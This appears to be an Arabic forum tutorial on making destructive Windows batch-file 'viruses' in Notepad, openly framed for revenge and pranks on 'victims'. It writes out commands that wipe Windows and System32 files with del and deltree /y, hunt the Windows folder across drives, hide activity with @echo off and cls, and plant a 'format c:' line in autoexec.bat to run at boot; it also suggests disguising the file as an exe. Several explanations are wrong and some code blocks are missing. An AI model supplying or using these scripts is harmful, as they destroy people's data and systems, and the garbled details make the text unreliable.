أقوى شرح لطرق صناعة الفيروسات
 

أقوى شرح لطرق صناعة الفيروسات

السلام عليكم ورحمة الله وبركاته

هي مالها داعي في الاختراق ولكن تستخدم للإنتقام وكذلك للفائدة
حبيت اقولكم انه مثل هذه الاشياء تصميمها سهل فوق ما يتم التصور وأنا كنت من الناس
اللي يشوفوا أن تصميم فيروس من راسك شيء مستحيل ولم أتصور بأنها
تافه وتصنع بكل سهوله.
أولاً: أنا حبيت أعرف كل شيء عن الفيروسات وبحثت في النت عن كيفية صناعتها
فتوصلت إلى أمور أفادتني كثيراً وقد جمعت صفحات كثيرة من منتديات مختلفة
ودرست أوامر الفيروسات واستفدت الكثير وها أنا أنقل لكم ما درست من تلك
الصفحات بالإضافة إلى بعض الإضافات من عندي .
بسم الله نبدأ :
× الفيروسات نوعان هي :
1- ما يصنع عن طريق برامج / وهي أقوى الفيروسات وأضرارها فادحة ولكن معظمها
مكتشف من قبل برامج الانتي فيروس.
2- ما يصنع عن طريق المفكرة notepad / وهي تعتبر أضعف من السابق وأضرارها
محدودة على حسب الكود المصنع ولكن معظمها غير مكتشفه من قبل برامج الانتي فيروس.
* نقاط هامة :
1- إن أهم شيء في صناعة الفيروس هو كود الفيروس وهذه هي الفكرة كيف تصنع كود فيروس
دون الاستعانه بشيء لا برامج ولا تنسخ أي كود يعني تجيب الكود من راسك أنت.
2- الكل يعرف بعد إنشاء كود الفيروس عليك أن تحفظه بإمتداد bat وإذا أردت
تغيره إلى exe أو com فيلزمك برامج لتغيرإمتداده وخداع الضحية.
3- اللي ما يعرف الطريقة لا يجربها على جهازه وأنا بريء من أي دمار يحدث لجهازك .
4- أول ما تنسخ الأكواد اللي في الأسفل في المفكرة وتحفظها بإمتداد bat فأنت قد صنعت فيروس
وإحذر من فتحه.
5- راح أبدأ الشرح على أكواد فيروسات صنعت بالمفكرة وأحدثت دمار قوي جداً وهي منقولة طبعاً.
6- ملخص عن أوامر الفيروسات (( مهم جداً )) :
* (( del ، deltree )) : أمر مسح : وهو أمر مهم ويكاد لا يخلو فيروس إلا وهذا الأمر فيه.
* (( *.exe )) : هذا الأمر يقوم بتحديد الملفات التي إمتدادها exe مهما كان إسمها.
* (( *.* )) : ويعتبر أقوى أوامر الفيروس على الاطلاق وهو قوي جداً وسيأتي شرحه وعند استخدامك لهذا الأمر
ستتعرض لسؤال من شاشة الدوز معنى السؤال أنه هل أنت متأكد من أنك تريد تنفيذ هذا الأمر وهذا
لقوته وبالتالي راح يكتشف الضحية أوامر الملف وأنا لم أستطع تخطي هذه الخطوة.
* (( @echo off )) : وهذا الأمر يعطى في الفيروس لتنفيذ ما تحت هذا الأمر من أوامر بأسرع صورة ممكنة على شاشة الدوس.
* (( cls )) : لمسح الأوامر السابقة اللي نفذها الفيروس وبداية تنفيذ أوامر أخرى وهذا يعطى إذا كان الكود طويل ليتم تنفيذ الأمر التالي بصورة سريعة.
# وهذي أهم أوامر الفيروس وسنتعرف على أوامر أخرى في الأسفل لا تقول مو فاهم لا تابع
الشرح وأنا متأكد إنك راح تصنع فيروس خاص يسجل بإسمك.

بسم الله نبدأ شرح الأكواد :

الكود الأول


واضح أن من صنع هذا الفيروس هو مبتدئ
لاحظ الأوامر اللي كتبها صاحب الكود وهي كالتالي :
أول شيء أعطى الأمر مسح .
ثاني شيء حدد مسار الملف اللي موجودة فيه الملفات المراد مسحها وهو ملف الويندوز C:windows
ثالث شيء حدد مسار الملفات المراد مسحها دون تحديد إسمها.
اول شي قدمه امر
del ( لمسح الملفات )
ثاني شي حدد المكان الموجوده فيه الملفات
C:windows
C:windowssystem32
C:windowssystem
هذه اهي الاماكن الموجوده فيها الملفات
ثالث شي قدمه نوع المسارات الي يجب ان تنمسح .
* إذاً الفيروس = مسح + تحديد مسار الملف الموجودة فيه الملفات المراد مسحها + تحديد الملفات المراد مسحها .
توضيح :
الأمر الأول أعتقد واضح والأمر الثاني برضه واضح والثالث إليك توضيحة :
(( A.ini ))
لو وضع هذا الأمر لقام الفيروس بمسح الملفات اللي إسمها A وإمتدادها ini
مثلاً فيه ملفات إسمها B وإمتدادها ini وهي (( B.ini )) فإن الفيروس لن يمسحها لأن الاسم
قد إختلف وكذلك إذا إختلف الإمتداد فلن يمسح الفيروس إلا الاسم والامتداد المحددين له
لذا فإن هذا الأمر ضعيف جداً.
(( *.ini ))
وهذا ما استخدمه صاحب الكود السابق وهو مسح جميع الملفات اللي إمتدادها ini
مهما كان إسمها إذاً هذه العلامة (( * )) تعني جميع الملفات الموجودة وهذا الأمر يعتبر متوسط القوة
لانه قد حدد المسار.
(( *.* ))
وهذا الأمر هو الأقوى على الاطلاق لانه أعطى أمر بمسح جميع الملفات الموجودة في الملف
المحدد مهما كان إسمها ومهما كان إمتدادها.
# إذاً بإمكاننا أن نغير الكود ونجلعه مختصر وأقوى من السابق وإليك التعديل :


del C:windows *.*
del C:windowssystem32 *.*
del C:windowssystem *.*


شوف التعديل الحين صار الفيروس مختصر وأقوى من السابق
ولاحظ أننا مسحنا هذه الأوامر كلها :
*.ini
*.exe
*.scr
*.txt
*.log
*.nls
*.drf
*.reg
*.sys
*.dll
وإستبدلناها بأمر واحد فقط هو (( *.* )).
فيه عيب ثاني في هذا الفيروس هو :
لو كان ملف الويندوز في الـD إذاً الفيروس عديم الفائدة ولا ضرر منه.
وبشرح الكود الثاني راح تفهم الكلام هذا.
انتهى شرح الكود الأول
الكود الثاني وهو كود فيروس القاتل وعمل الفيروس هو مسح الويندوز بالكامل :
لاحظ أول أمر اللي هو :
cd ..
وهذا الأمر مهم وهو من جعل من الفيروس الأول فيروس ضعيف
وظيفة الأمر هو امر الرجوع للمفات للوراء .
أي سيبحث الفيروس عن مسار الملف المحدد له إلى أن يجده
بمعنى أنه لو كان الويندوز في :
c: او d:او f:او e:
راح يصيده الفيروس يعني راح يصيده أما لو كان الأمر كما في الفيروس الأول وهو البحث
في الـ C فقط فإن الفيروس لن يصيد الويندوز إلا إذا كان الويندوز في الـ C فقط .
الأوامر :
cd WINDOWS
او
cd system32
او
cd system
هذه الملفات المحددة المطلوب من الفيروس الوصول إليها
والأمر cd الموجود أمام كل مجلد هو أمر للرجوع للوراء كما وضحنا سابقاً
أي أن الفيروس سيبحث أولاً في القرص C إلى أن يجد الملف المحدد له
فإن لم يجده سيرجع الفيروس تلقائياً وسيبحث عن الملف المحدد له في القرص D
فإن لم يجده سيرجع الفيروس تلقائياً وسيبحث عن الملف المحدد له في القرص E
فإن لم يجده سيرجع الفيروس تلقائياً وسيبحث عن الملف المحدد له في القرص F
سيبحث الفيروس عن الملف إلى أن يصيده وهذا أمر قوي في هذا الفيروس
الأمر :
Cls
وهو أمر لمسح شاشة الدوس وجعلها نظيفة لتهئتها لأوامر قادمة
تم استخدام هذا الامر من اجل جعل الاوامر تنفذ بسرعه ومن دون شعور الضحيه بالاوامر التي مرت عليه
الأوامر :
del *.ocx
del *.sys
del *.ini
del *.drf
del *.log
del *.nls
del *.wsc
del *.oca
del *.msc
اعتقد ان تم شرح هذا الامر من قبل
ولا تنسون هذا الامر لمسح الملفات التي على هذه المسارات فان كنت
تريد ان تعرف كيفيه مسح ملف محدد فما عليك إلا كتابه
del file name.exe او dll او اي مسار
ويجب ان يكون الملف الذي تريد حذفه محدد المسار عن طريق شاشة الدوس
يعني لازم نكتب امر المسح اول شي ومن ثما اسم الملف المطلوب مسحه ومن ثم مسار الملف
وكما قلنا الأمر *.* هو الأقوى مثلاً :
del *.*
لأغنانى هذا الأمر
عن السابق
الأمر :
@echo off
أمر يستخدم من اجل كتابة اوامر تنفذ على شاشة الدوس بأسرع صورة ممكنه حتى لا يشعر بها الضحية.
الأمر :
echo
اكتب هنا الاوامر او اكتب ما تريد ان يظهر على شاشة الدوس لينفذ بسرعة عالية.
بعدين مثل ما اتشوفون تم تحديد مسارات الملفات بذكر اسم المحرك c: // d: // e: // f: //
والسبب ان وندزي بالدي ووقت شغلت الفايرس بالسي ما صاد الملفات
يعني اذا قدمتو الفايرس بملف ون زب وكان وندزه غير موجود على السي راح يفلت من الفايرس ولهذا
السبب تم تحديد المسارات مع وضع امر المسح الكلي للمسارات دون اسم الملف
بمعني اخر ان تم تشغيل الفايرس بالكمبيوتر سيتم تدمير الجهاز ولاكن اذا تم تشغيل الفايرس بالسي ووندزه غير
موجود بالسي ما راح يصيد الملفات
بس الحين بعد التعديل راح يصيدها يعني شي اكييد الجهاز ما يتصلح إلا إذا تفرمت.
انتهى شرح الكود الثاني
الكود الثالث :

الشرح
echo format c: /q /u /autotest >nul >>c:autoexec.bat
الأمر:
echo
وظيفته : من اجل الكتابه بأسرع ما يمكن.
ظهر لدينا أمر جديد وهو هذا الأمر :
format c: /q /u /
وظيفته : وهذا الأمر من اسمه معروف وهو لعمل فورمات
الأمر:
اسم حق الامر من اجل وضعه بملف autotest
أيضاً أمر جديد وهو الأمر :
nul
وظيفته : عملية مضاعفه لامر الفورمات من اجل جعل الامر مرتين بدل مره واحده .
c:autoexec.bat المكان الذي سيتم الحفظ فيه بجهاز الضحيه
وتم اختيار اسم autoexec
من اجل ان يعمل الفايرس من تلقاء نفسه
واذا قمت بكتابة كود الفايرس بنوته باد ومن ثم تغير مسار النوته إلى bat
وفتح الملف سوف تجد ملفات باسم
autoexec موجود في c:
لان تم تحديد مكان الحفظ في السي
وستكون الاوامر بهذا الشكل
format c: /q /u /autotest
format c: /q /u /autotest
وظهرت الاوامر بهذا الشكل لاننا كتبنا في الكود nul
ولهذا السبب تم مضاعفة الامر في الملف الذي عمله الفايرس نسخه في السي
ومثل ما ترون تم مضاعفة الامر الذي شرحته لكم اكثر من مره .
ومثل ما ترون الفيروس عبارة عن سطر
والأسطر الباقية نفس السطر اللهم غير إسم القرص فقط
لتتم العملية بنجاح.
انتهى شرح الكود الثالث
الكود الرابع :
الأمر :
@Echo off
تم شرحه وهو للكتابة بصورة سريعة .
الأمر :
cd %WinDir%\System\
تم شرحه وهو لتحديد مسار الملف المراد الوصول إليه.
الأمر :
cd
تم شرحه وهو للرجوع للوراء.
الأمر :
deltree
تم شرحه وهو أمر للمسح أو الحذف .
الأمر:
/y
وهذا الأمر جديد وإليك شرحه
هذا الأمر يستخدم لتنفيذ الأوامر دون الموافقة عليها.
وأنا أعتقد أنه لا يأتي إلا مع الأمر deltree
فإذا سويت del /y *.sys فإن الفيروس لن يعمل
إذاً لا يعمل إلا مع الأمر deltree هذا من استنتاجي
وأنا لست متأكداً لاني أجريت تجارب ولم تنجح والله أعلم .
الأوامر :
*.dll
*.sys
*.ini
*.exe
*.txt
*.bat
تم شرحها وهي الملفات المراد مسحها أو حذفها.
انتهى شرح الكود الرابع
* تجارب :
انا الأن اريد ان امزح مع احد و فى نفس الوقت عاوز اعلمه درس و تحذير فيمكننى ان اصنع فيروس يقوم بمسح جميع ملفات الصور التى امتددها *.jpg. كما اننى اريد ان امسح جميع ملفات الأغانى التى امتددها *.mp3 و جميع امتدادت الملفات الخاصة بلافلام و التى امتدادها *.asf و التى توجد فى E: كل ما علينا هو تعديل الكود ليصبح كالأتى:وأخيراً أتمنى أنكم إستفدتم